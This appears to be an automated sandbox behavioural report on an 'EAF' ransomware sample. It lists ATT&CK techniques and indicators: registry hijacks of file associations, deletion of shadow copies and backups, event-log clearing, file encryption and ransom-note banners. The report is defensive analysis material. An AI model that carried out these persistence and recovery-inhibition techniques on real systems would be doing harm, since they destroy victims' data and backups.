b3c495a36fea5be7069701fc373d83739aa721b87aac18c3abc390d836500047

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "empty"	[email protected]

Modifies system executable filetype association 2 TTPs 1 IoCs

persistence

Modify Registry

Change Default File Association

T1042

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "\"C:\\Windows\\A8C4AD38.exe\" \"%L\""	[email protected]

UAC bypass 3 TTPs
evasion trojan

Bypass User Account Control
T1088

Disabling Security Tools
T1089

Modify Registry
T1112
Clears Windows event logs 1 TTPs
evasion ransomware

Indicator Removal on Host
T1070
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Modifies boot configuration data using bcdedit 1 TTPs 6 IoCs

ransomware evasion

Inhibit System Recovery

pid	Process
560	bcdedit.exe
1092	bcdedit.exe
520	bcdedit.exe
1308	bcdedit.exe
1940	bcdedit.exe
556	bcdedit.exe

Deletes backup catalog 3 TTPs 2 IoCs

Uses wbadmin.exe to inhibit system recovery.

Command-Line Interface

T1059

File Deletion

T1107

Inhibit System Recovery

pid	Process
540	wbadmin.exe
908	wbadmin.exe

Disables Task Manager via registry modification
evasion
Disables use of System Restore points 1 TTPs
evasion

Inhibit System Recovery
T1490

Executes dropped EXE 2 IoCs

pid	Process
1772	[email protected]
1676	BackupXXXA8C4AD38.exe

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

Modifies extensions of user files 2 IoCs

Ransomware generally changes the extension on encrypted files.

description	ioc	Process
File opened for modification	C:\Users\Admin\Pictures\BackupOpen.tiff	[email protected]
File opened for modification	C:\Users\Admin\Pictures\WatchRename.tiff	[email protected]

Deletes itself 1 IoCs

pid	Process
1772	[email protected]

Drops startup file 4 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\[email protected]	[email protected]
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini	[email protected]
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\[[email protected]][A8C4AD38]desktop.ini.EAF	[email protected]
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\#FILES-ENCRYPTED.txt	[email protected]

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Drops desktop.ini file(s) 64 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\IHVY6LD2\desktop.ini	[email protected]
File opened for modification	C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini	[email protected]
File opened for modification	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini	[email protected]
File opened for modification	C:\$Recycle.Bin\S-1-5-21-1083475884-596052423-1669053738-1000\desktop.ini	[email protected]
File opened for modification	C:\Users\Admin\Contacts\desktop.ini	[email protected]
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\History\History.IE5\desktop.ini	[email protected]
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Desktop.ini	[email protected]
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\desktop.ini	[email protected]
File opened for modification	C:\Users\Public\Pictures\desktop.ini	[email protected]
File opened for modification	C:\Users\Admin\Documents\desktop.ini	[email protected]
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\A9INZ3MO\desktop.ini	[email protected]
File opened for modification	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Desktop.ini	[email protected]
File opened for modification	C:\ProgramData\Microsoft\Windows\Ringtones\desktop.ini	[email protected]
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Desktop.ini	[email protected]
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\desktop.ini	[email protected]
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini	[email protected]
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games\Desktop.ini	[email protected]
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini	[email protected]
File opened for modification	C:\Users\Admin\Videos\desktop.ini	[email protected]
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\History\desktop.ini	[email protected]
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\M1JJU24G\desktop.ini	[email protected]
File opened for modification	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini	[email protected]
File opened for modification	C:\Users\Admin\Music\desktop.ini	[email protected]
File opened for modification	C:\Users\Admin\Saved Games\desktop.ini	[email protected]
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\VP7YQ4XO\desktop.ini	[email protected]
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\desktop.ini	[email protected]
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini	[email protected]
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SendTo\Desktop.ini	[email protected]
File opened for modification	C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\Desktop.ini	[email protected]
File opened for modification	C:\Users\Public\Libraries\desktop.ini	[email protected]
File opened for modification	C:\Users\Admin\Desktop\desktop.ini	[email protected]
File opened for modification	C:\Users\Admin\Searches\desktop.ini	[email protected]
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\VCRELHVT\desktop.ini	[email protected]
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Desktop.ini	[email protected]
File opened for modification	C:\Users\Public\desktop.ini	[email protected]
File opened for modification	C:\Users\Admin\Favorites\Links\desktop.ini	[email protected]
File opened for modification	C:\Users\Public\Music\desktop.ini	[email protected]
File opened for modification	C:\Users\Public\Recorded TV\Sample Media\desktop.ini	[email protected]
File opened for modification	C:\Users\Public\Videos\Sample Videos\desktop.ini	[email protected]
File opened for modification	C:\Users\Admin\Links\desktop.ini	[email protected]
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\desktop.ini	[email protected]
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn\desktop.ini	[email protected]
File opened for modification	C:\Users\Public\Downloads\desktop.ini	[email protected]
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\Stationery\Desktop.ini	[email protected]
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T2CDOEA4\desktop.ini	[email protected]
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows Mail\Stationery\Desktop.ini	[email protected]
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini	[email protected]
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini	[email protected]
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini	[email protected]
File opened for modification	C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Desktop.ini	[email protected]
File opened for modification	C:\Users\Public\Pictures\Sample Pictures\desktop.ini	[email protected]
File opened for modification	C:\Users\Public\Documents\desktop.ini	[email protected]
File opened for modification	C:\Users\Admin\Favorites\desktop.ini	[email protected]
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\desktop.ini	[email protected]
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	[email protected]
File opened for modification	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini	[email protected]
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini	[email protected]
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Desktop.ini	[email protected]
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini	[email protected]
File opened for modification	C:\Users\Public\Recorded TV\desktop.ini	[email protected]
File opened for modification	C:\Users\Public\Desktop\desktop.ini	[email protected]
File opened for modification	C:\Program Files\desktop.ini	[email protected]
File opened for modification	C:\Users\Admin\Pictures\desktop.ini	[email protected]
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\N6KW9TJE\desktop.ini	[email protected]

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
3	icanhazip.com

Drops file in System32 directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\Recovery	ReAgentc.exe
File opened for modification	C:\Windows\system32\Recovery\ReAgent.xml	ReAgentc.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

Defacement

T1491

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1083475884-596052423-1669053738-1000\Control Panel\Desktop\Wallpaper	[email protected]

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\[[email protected]][A8C4AD38]org.eclipse.e4.ui.workbench.nl_zh_4.4.0.v20140623020002.jar.EAF	[email protected]
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\[[email protected]][A8C4AD38]org-netbeans-api-search.jar.EAF	[email protected]
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\Stationery\Garden.jpg	[email protected]
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\META-INF\#FILES-ENCRYPTED.txt	[email protected]
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\[[email protected]][A8C4AD38]boot.jar.EAF	[email protected]
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels\NavigationLeft_SelectionSubpicture.png	[email protected]
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Ashgabat	[email protected]
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\flower_trans_matte.wmv	[email protected]
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\db\LICENSE	[email protected]
File created	C:\Program Files\Java\jdk1.7.0_80\jre\bin\[[email protected]][A8C4AD38]jabswitch.exe.EAF	[email protected]
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\[[email protected]][A8C4AD38]Karachi.EAF	[email protected]
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\[[email protected]][A8C4AD38]Berlin.EAF	[email protected]
File created	C:\Program Files\[[email protected]][A8C4AD38]GrantUnblock.au3.EAF	[email protected]
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\TipBand.dll	[email protected]
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\#FILES-ENCRYPTED.txt	[email protected]
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\#FILES-ENCRYPTED.txt	[email protected]
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\it-IT\rtscom.dll.mui	[email protected]
File opened for modification	C:\Program Files\DVD Maker\WMM2CLIP.dll	[email protected]
File opened for modification	C:\Program Files\Google\Chrome\Application\89.0.4389.114\default_apps\#FILES-ENCRYPTED.txt	[email protected]
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ecf.filetransfer_5.0.0.v20140827-1444.jar	[email protected]
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\locale\org-openide-util_ja.jar	[email protected]
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-core-multiview.jar	[email protected]
File created	C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\[[email protected]][A8C4AD38]OSPPSVC.EXE.EAF	[email protected]
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\nav_rightarrow.png	[email protected]
File created	C:\Program Files\Common Files\Microsoft Shared\ink\bg-BG\#FILES-ENCRYPTED.txt	[email protected]
File opened for modification	C:\Program Files\7-Zip\Lang\mk.txt	[email protected]
File opened for modification	C:\Program Files\7-Zip\Lang\sr-spc.txt	[email protected]
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Scenes_LOOP_BG.wmv	[email protected]
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\[[email protected]][A8C4AD38]Maceio.EAF	[email protected]
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\#FILES-ENCRYPTED.txt	[email protected]
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\jvm.lib	[email protected]
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.artifact.repository.nl_zh_4.4.0.v20140623020002.jar	[email protected]
File opened for modification	C:\Program Files\Common Files\System\msadc\ja-JP\msaddsr.dll.mui	[email protected]
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Indian\Maldives	[email protected]
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\#FILES-ENCRYPTED.txt	[email protected]
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\[[email protected]][A8C4AD38]license.html.EAF	[email protected]
File opened for modification	C:\Program Files\7-Zip\Lang\fa.txt	[email protected]
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\META-INF\eclipse.inf	[email protected]
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\[[email protected]][A8C4AD38]org.eclipse.swt_3.103.1.v20140903-1938.jar.EAF	[email protected]
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\META-INF\#FILES-ENCRYPTED.txt	[email protected]
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.model.workbench_1.1.0.v20140512-1820.jar	[email protected]
File created	C:\Program Files\Common Files\System\msadc\fr-FR\#FILES-ENCRYPTED.txt	[email protected]
File opened for modification	C:\Program Files\DVD Maker\fr-FR\OmdProject.dll.mui	[email protected]
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Chicago	[email protected]
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\[[email protected]][A8C4AD38]com.jrockit.mc.console.ui.diagnostic.zh_CN_5.5.0.165303.jar.EAF	[email protected]
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\leftnav.gif	[email protected]
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-autoupdate-services_ja.jar	[email protected]
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\Filters\VISFILT.DLL	[email protected]
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\de-DE\rtscom.dll.mui	[email protected]
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Adelaide	[email protected]
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\[[email protected]][A8C4AD38]asl-v20.txt.EAF	[email protected]
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jface.text_3.9.1.v20140827-1810.jar	[email protected]
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\Stationery\Shades of Blue.htm	[email protected]
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\[[email protected]][A8C4AD38]Rainy_River.EAF	[email protected]
File created	C:\Program Files\Google\Chrome\Application\89.0.4389.114\Locales\[[email protected]][A8C4AD38]et.pak.EAF	[email protected]
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\#FILES-ENCRYPTED.txt	[email protected]
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\HueCycle\NavigationLeft_ButtonGraphic.png	[email protected]
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\cursors.properties	[email protected]
File created	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\[[email protected]][A8C4AD38]Pohnpei.EAF	[email protected]
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\[[email protected]][A8C4AD38]org-netbeans-modules-spi-actions.jar.EAF	[email protected]
File opened for modification	C:\Program Files\7-Zip\Lang\el.txt	[email protected]
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\hr-HR\tipresx.dll.mui	[email protected]
File created	C:\Program Files\Java\jdk1.7.0_80\jre\bin\[[email protected]][A8C4AD38]prism-d3d.dll.EAF	[email protected]
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Magadan	[email protected]

Drops file in Windows directory 5 IoCs

description	ioc	Process
File created	C:\Windows\A8C4AD38.bat	[email protected]
File created	C:\Windows\A8C4AD38.ico	[email protected]
File created	C:\Windows\A8C4AD38.exe	[email protected]
File created	C:\Windows\BackupXXXA8C4AD38.exe	[email protected]
File created	C:\Windows\This Is Your Helper File.txt	[email protected]

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Interacts with shadow copies 2 TTPs 2 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

File Deletion

T1107

Inhibit System Recovery

pid	Process
1820	vssadmin.exe
1520	vssadmin.exe

Modifies registry class 25 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.EAF\Shell\Open\command\ = "\"C:\\Windows\\A8C4AD38.exe\" \"%L\""	[email protected]
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.EAF\DefaultIcon	[email protected]
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\*\shell\runas\ = "Take Ownership"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\*\shell\runas\command	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\*\shell\runas\command\ = "cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shell\runas\command	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.EAF\Shell	[email protected]
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.EAF\Shell\Open	[email protected]
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\*\shell\runas\NoWorkingDirectory	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shell\runas\ = "Take Ownership"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shell\runas	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shell\runas\NoWorkingDirectory	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.EAF	[email protected]
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\*\shell\runas	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\*\shell\runas\command	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shell\runas\command\ = "cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shell\runas\command\IsolatedCommand = "cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.EAF\DefaultIcon\ = "C:\\Windows\\A8C4AD38.ico"	[email protected]
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "\"C:\\Windows\\A8C4AD38.exe\" \"%L\""	[email protected]
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\*\shell\runas	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\*\shell\runas\command\IsolatedCommand = "cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shell\runas	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shell\runas\command	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.EAF\ = "EAF File"	[email protected]
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.EAF\Shell\Open\command	[email protected]

Runs ping.exe 1 TTPs 3 IoCs

Remote System Discovery

T1018

pid	Process
892	PING.EXE
328	PING.EXE
2032	PING.EXE

Suspicious behavior: EnumeratesProcesses 7 IoCs

pid	Process
556	sample.exe
556	sample.exe
1772	[email protected]
1772	[email protected]
1772	[email protected]
1772	[email protected]
1772	[email protected]

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	556	sample.exe
Token: SeDebugPrivilege	1772	[email protected]
Token: SeBackupPrivilege	632	wbengine.exe
Token: SeRestorePrivilege	632	wbengine.exe
Token: SeSecurityPrivilege	632	wbengine.exe
Token: SeBackupPrivilege	1176	vssvc.exe
Token: SeRestorePrivilege	1176	vssvc.exe
Token: SeAuditPrivilege	1176	vssvc.exe
Token: SeIncreaseQuotaPrivilege	828	WMIC.exe
Token: SeSecurityPrivilege	828	WMIC.exe
Token: SeTakeOwnershipPrivilege	828	WMIC.exe
Token: SeLoadDriverPrivilege	828	WMIC.exe
Token: SeSystemProfilePrivilege	828	WMIC.exe
Token: SeSystemtimePrivilege	828	WMIC.exe
Token: SeProfSingleProcessPrivilege	828	WMIC.exe
Token: SeIncBasePriorityPrivilege	828	WMIC.exe
Token: SeCreatePagefilePrivilege	828	WMIC.exe
Token: SeBackupPrivilege	828	WMIC.exe
Token: SeRestorePrivilege	828	WMIC.exe
Token: SeShutdownPrivilege	828	WMIC.exe
Token: SeDebugPrivilege	828	WMIC.exe
Token: SeSystemEnvironmentPrivilege	828	WMIC.exe
Token: SeRemoteShutdownPrivilege	828	WMIC.exe
Token: SeUndockPrivilege	828	WMIC.exe
Token: SeManageVolumePrivilege	828	WMIC.exe
Token: 33	828	WMIC.exe
Token: 34	828	WMIC.exe
Token: 35	828	WMIC.exe
Token: SeIncreaseQuotaPrivilege	828	WMIC.exe
Token: SeSecurityPrivilege	828	WMIC.exe
Token: SeTakeOwnershipPrivilege	828	WMIC.exe
Token: SeLoadDriverPrivilege	828	WMIC.exe
Token: SeSystemProfilePrivilege	828	WMIC.exe
Token: SeSystemtimePrivilege	828	WMIC.exe
Token: SeProfSingleProcessPrivilege	828	WMIC.exe
Token: SeIncBasePriorityPrivilege	828	WMIC.exe
Token: SeCreatePagefilePrivilege	828	WMIC.exe
Token: SeBackupPrivilege	828	WMIC.exe
Token: SeRestorePrivilege	828	WMIC.exe
Token: SeShutdownPrivilege	828	WMIC.exe
Token: SeDebugPrivilege	828	WMIC.exe
Token: SeSystemEnvironmentPrivilege	828	WMIC.exe
Token: SeRemoteShutdownPrivilege	828	WMIC.exe
Token: SeUndockPrivilege	828	WMIC.exe
Token: SeManageVolumePrivilege	828	WMIC.exe
Token: 33	828	WMIC.exe
Token: 34	828	WMIC.exe
Token: 35	828	WMIC.exe
Token: SeSecurityPrivilege	1516	wevtutil.exe
Token: SeBackupPrivilege	1516	wevtutil.exe
Token: SeSecurityPrivilege	1520	wevtutil.exe
Token: SeBackupPrivilege	1520	wevtutil.exe
Token: SeSecurityPrivilege	1884	wevtutil.exe
Token: SeBackupPrivilege	1884	wevtutil.exe
Token: SeSecurityPrivilege	1484	wevtutil.exe
Token: SeBackupPrivilege	1484	wevtutil.exe
Token: SeSecurityPrivilege	1980	wevtutil.exe
Token: SeBackupPrivilege	1980	wevtutil.exe
Token: SeSecurityPrivilege	1880	wevtutil.exe
Token: SeBackupPrivilege	1880	wevtutil.exe
Token: SeSecurityPrivilege	768	wevtutil.exe
Token: SeBackupPrivilege	768	wevtutil.exe
Token: SeSecurityPrivilege	1216	wevtutil.exe
Token: SeBackupPrivilege	1216	wevtutil.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 556 wrote to memory of 1772	556	sample.exe	29
PID 556 wrote to memory of 1772	556	sample.exe	29
PID 556 wrote to memory of 1772	556	sample.exe	29
PID 1772 wrote to memory of 1528	1772	[email protected]	31
PID 1772 wrote to memory of 1528	1772	[email protected]	31
PID 1772 wrote to memory of 1528	1772	[email protected]	31
PID 1528 wrote to memory of 1544	1528	cmd.exe	33
PID 1528 wrote to memory of 1544	1528	cmd.exe	33
PID 1528 wrote to memory of 1544	1528	cmd.exe	33
PID 1772 wrote to memory of 1392	1772	[email protected]	34
PID 1772 wrote to memory of 1392	1772	[email protected]	34
PID 1772 wrote to memory of 1392	1772	[email protected]	34
PID 1392 wrote to memory of 540	1392	cmd.exe	36
PID 1392 wrote to memory of 540	1392	cmd.exe	36
PID 1392 wrote to memory of 540	1392	cmd.exe	36
PID 1772 wrote to memory of 1224	1772	[email protected]	40
PID 1772 wrote to memory of 1224	1772	[email protected]	40
PID 1772 wrote to memory of 1224	1772	[email protected]	40
PID 1224 wrote to memory of 560	1224	cmd.exe	42
PID 1224 wrote to memory of 560	1224	cmd.exe	42
PID 1224 wrote to memory of 560	1224	cmd.exe	42
PID 1224 wrote to memory of 1092	1224	cmd.exe	43
PID 1224 wrote to memory of 1092	1224	cmd.exe	43
PID 1224 wrote to memory of 1092	1224	cmd.exe	43
PID 1772 wrote to memory of 636	1772	[email protected]	44
PID 1772 wrote to memory of 636	1772	[email protected]	44
PID 1772 wrote to memory of 636	1772	[email protected]	44
PID 636 wrote to memory of 1820	636	cmd.exe	46
PID 636 wrote to memory of 1820	636	cmd.exe	46
PID 636 wrote to memory of 1820	636	cmd.exe	46
PID 636 wrote to memory of 828	636	cmd.exe	49
PID 636 wrote to memory of 828	636	cmd.exe	49
PID 636 wrote to memory of 828	636	cmd.exe	49
PID 1772 wrote to memory of 580	1772	[email protected]	51
PID 1772 wrote to memory of 580	1772	[email protected]	51
PID 1772 wrote to memory of 580	1772	[email protected]	51
PID 580 wrote to memory of 520	580	cmd.exe	53
PID 580 wrote to memory of 520	580	cmd.exe	53
PID 580 wrote to memory of 520	580	cmd.exe	53
PID 1772 wrote to memory of 316	1772	[email protected]	54
PID 1772 wrote to memory of 316	1772	[email protected]	54
PID 1772 wrote to memory of 316	1772	[email protected]	54
PID 316 wrote to memory of 1308	316	cmd.exe	56
PID 316 wrote to memory of 1308	316	cmd.exe	56
PID 316 wrote to memory of 1308	316	cmd.exe	56
PID 1772 wrote to memory of 1016	1772	[email protected]	57
PID 1772 wrote to memory of 1016	1772	[email protected]	57
PID 1772 wrote to memory of 1016	1772	[email protected]	57
PID 1016 wrote to memory of 1712	1016	cmd.exe	59
PID 1016 wrote to memory of 1712	1016	cmd.exe	59
PID 1016 wrote to memory of 1712	1016	cmd.exe	59
PID 1772 wrote to memory of 1476	1772	[email protected]	60
PID 1772 wrote to memory of 1476	1772	[email protected]	60
PID 1772 wrote to memory of 1476	1772	[email protected]	60
PID 1476 wrote to memory of 216	1476	cmd.exe	62
PID 1476 wrote to memory of 216	1476	cmd.exe	62
PID 1476 wrote to memory of 216	1476	cmd.exe	62
PID 1772 wrote to memory of 576	1772	[email protected]	63
PID 1772 wrote to memory of 576	1772	[email protected]	63
PID 1772 wrote to memory of 576	1772	[email protected]	63
PID 576 wrote to memory of 1244	576	cmd.exe	65
PID 576 wrote to memory of 1244	576	cmd.exe	65
PID 576 wrote to memory of 1244	576	cmd.exe	65
PID 576 wrote to memory of 1492	576	cmd.exe	66

System policy modification 1 TTPs 2 IoCs

evasion

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticecaption = "EAF"	[email protected]
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticetext = "You were attacked by the EAF team plz read #FILES-ENCRYPTED.txt"	[email protected]

C:\Users\Admin\AppData\Local\Temp\sample.exe
"C:\Users\Admin\AppData\Local\Temp\sample.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
